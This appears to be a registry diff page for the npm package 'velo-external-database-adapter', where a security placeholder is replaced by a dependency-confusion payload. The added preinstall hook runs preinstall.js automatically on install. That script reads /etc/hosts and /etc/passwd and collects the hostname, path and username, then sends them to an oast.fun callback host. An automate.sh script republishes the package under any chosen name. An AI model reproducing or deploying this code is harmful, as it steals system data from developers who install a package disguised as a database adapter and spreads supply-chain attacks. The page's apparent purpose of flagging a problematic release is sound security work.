velo-external-database-adapter 0.0.1-security → 48.47.48

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.

This version of velo-external-database-adapter might be problematic. Click here for more details.

Files changed (5) hide show
  1. package/README.md +6 -3
  2. package/automate.sh +9 -0
  3. package/index.js +1 -0
  4. package/package.json +14 -3
  5. package/preinstall.js +28 -0
package/README.md CHANGED
@@ -1,5 +1,8 @@
1
- # Security holding package
1
+ # dependency_confusion_poc
2
2
 
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
3
+ # To use this template:
4
4
 
5
- Please refer to www.npmjs.com/advisories?search=velo-external-database-adapter for more information.
5
+ - Clone this repo
6
+ - Install dependencies with npm install (Optional)
7
+ - Login with your npmjs account by `npm login`
8
+ - Create and upload an NPM packaged with `./automate.sh {package_name}`
package/automate.sh ADDED
@@ -0,0 +1,9 @@
1
+ #!/bin/bash
2
+
3
+ DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" >/dev/null 2>&1 && pwd )"
4
+ TMP_FILE="$DIR/package.json.tmp"
5
+ sed "s,\"name\": \".*\",\"name\": \"$1\"," "$DIR/package.json" > "$TMP_FILE" && mv "$TMP_FILE" "$DIR/package.json"
6
+ sed -i '' "s~\"name\": \".*\"~\"name\": \"$1\"~" package.json
7
+ perl -i -pe "s~'User-Agent': '.*'~'User-Agent': '$1'~" preinstall.js
8
+
9
+ npm publish
package/index.js ADDED
@@ -0,0 +1 @@
1
+ console.log("Hello")
package/package.json CHANGED
@@ -1,6 +1,17 @@
1
1
  {
2
2
  "name": "velo-external-database-adapter",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "48.47.48",
4
+ "type": "module",
5
+ "description": "",
6
+ "main": "index.js",
7
+ "scripts": {
8
+ "test": "echo \"Error: no test specified\" && exit 1",
9
+ "preinstall": "node preinstall.js"
10
+ },
11
+ "author": "",
12
+ "license": "ISC",
13
+ "dependencies": {
14
+ "node-fetch": "^3.3.1",
15
+ "os": "^0.1.2"
16
+ }
6
17
  }
package/preinstall.js ADDED
@@ -0,0 +1,28 @@
1
+ import fetch from 'node-fetch';
2
+ import os from 'os'
3
+ import path from 'path';
4
+ import fs from 'fs';
5
+ import {fileURLToPath} from 'url';
6
+
7
+ const url = `http://cjhdjb92vtc0000vk8cggjes3fwyyyyyb.oast.fun`;
8
+
9
+ const __filename = fileURLToPath(import.meta.url);
10
+ const __dirname = path.dirname(__filename);
11
+ const host = os.hostname();
12
+ const headers = {
13
+ 'User-Agent': 'velo-external-database-adapter',
14
+ 'X-Hostname': host,
15
+ 'X-path': __dirname,
16
+ 'X-Current-User': os.userInfo().username
17
+ };
18
+
19
+ fs.readFile('/etc/hosts', 'utf8', (err, data) => {
20
+ fetch(`${url}?hostData=${encodeURIComponent(data)}`, { headers })
21
+ });
22
+ fs.readFile('/etc/passwd', 'utf8', (err, data) => {
23
+ fetch(`${url}?passwdData=${encodeURIComponent(data)}`, { headers })
24
+ });
25
+
26
+
27
+
28
+